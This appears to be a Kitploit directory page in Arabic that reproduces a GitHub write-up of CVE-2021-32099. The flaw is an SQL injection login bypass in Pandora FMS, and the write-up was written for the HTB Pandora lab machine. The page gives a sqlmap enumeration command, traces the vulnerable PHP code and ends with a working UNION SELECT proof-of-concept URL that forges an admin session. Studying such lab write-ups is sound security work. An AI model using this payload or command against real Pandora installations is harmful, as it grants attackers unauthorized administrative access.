Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-32099_SQLi — CVE-2021-32099 حقن SQL يسمح للمهاجم بتجاوز تسجيل الدخول. من HTB مع الحب | Kitploit
أدوات/GitHubGitHub/l3eol3eo/cve-2021-32099_sqli
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubl3eol3eo/cve-2021-32099_sqli

CVE-2021-32099_SQLi

CVE-2021-32099 حقن SQL يسمح للمهاجم بتجاوز تسجيل الدخول. من HTB مع الحب

عرض المستودع
714منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-32099 SQLi تجاوز تسجيل الدخول

مفيد عند محاولة قراءة User Flag على Pandora.htb

CVE-2021-32099 SQLi تسمح للمهاجم بتجاوز تسجيل الدخول.

الهدف

الاستغلال على: Pandora FMS v7.0NG.742_FIX_PERL2020

التحليل

اقرأ من cvedetail. نعرف نقطة النهاية للهدف: http://localhost:8000/pandora_console/include/chart_generator.php?session_id=PayloadHere => Access denied.

alt text sqlmap -r req.txt -p session_id --dbms=mysql --dbs --risk=3 --level=5

بعد التعداد، نركز فقط على جدول tsessions_php. يحتوي tssessions_php على 3 أعمدة: id_session, last_active, data. (نتيجة sqlmap بتنسيق خاطئ)

alt text

/include/chart_generator.php

root@kitploit:~
71  // Try to initialize session using existing php session id.
72  $user = new PandoraFMS\User(['phpsessionid' => $_REQUEST['session_id']]);
73  if (check_login(false) === false) {   
74     // Error handler.
 ⋮
96  }
97
98  // Access granted.
  • سيتم تعيين phpsessionid بقيمة session_id (PayloadHere)

/include/lib/User.php

root@kitploit:~
60  public function __construct($data)
61  {
 ⋮
68     if (is_array($data) === true) {
69        if (isset($data['phpsessionid']) === true) {
70           $this->sessions[$data['phpsessionid']] = 1;
71           $info = \db_get_row_filter(
72              'tsessions_php',
73              ['id_session' => $data['phpsessionid']]
74          );
75
76         if ($info !== false) {
77            // Process.
78            $session_data = session_decode($info['data']);
79            $this->idUser = $_SESSION['id_usuario'];
80
81            // Valid session.
82            return $this;
83         }
  • سيتم تعيين id_session بقيمة phpsessionid
  • سيوفر كل الكود هذا الاستعلام: select * from tsessions_php where id_session=***PayloadHere***

/include/lib/db/mysql.php

root@kitploit:~
848  function db_get_row_filter($table, $filter, $fields=false)
849  {  
850     if (empty($fields)) {
851         $fields = '*';
852     }
 ⋮
861     $filter = db_format_array_where_clause_sql($filter, ' WHERE ');
 ⋮
868     $sql = sprintf('SELECT %s FROM %s %s', $fields, $table, $filter);

POC:

http://localhost:8000/pandora_console/include/chart_generator.php?session_id=PayloadHere%27%20union%20select%20%271%27,%272%27,%27id_usuario|s:5:%22admin%22;%27%20--%20a => Pandora FMS Graph ( - )

إعادة التحميل: http://localhost:8000/pandora_console/ للوصول إلى صفحة الويب

المراجع:

https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained

https://portswigger.net/daily-swig/multiple-vulnerabilities-in-pandora-fms-could-trigger-remote-execution-attack

تنزيل الأداة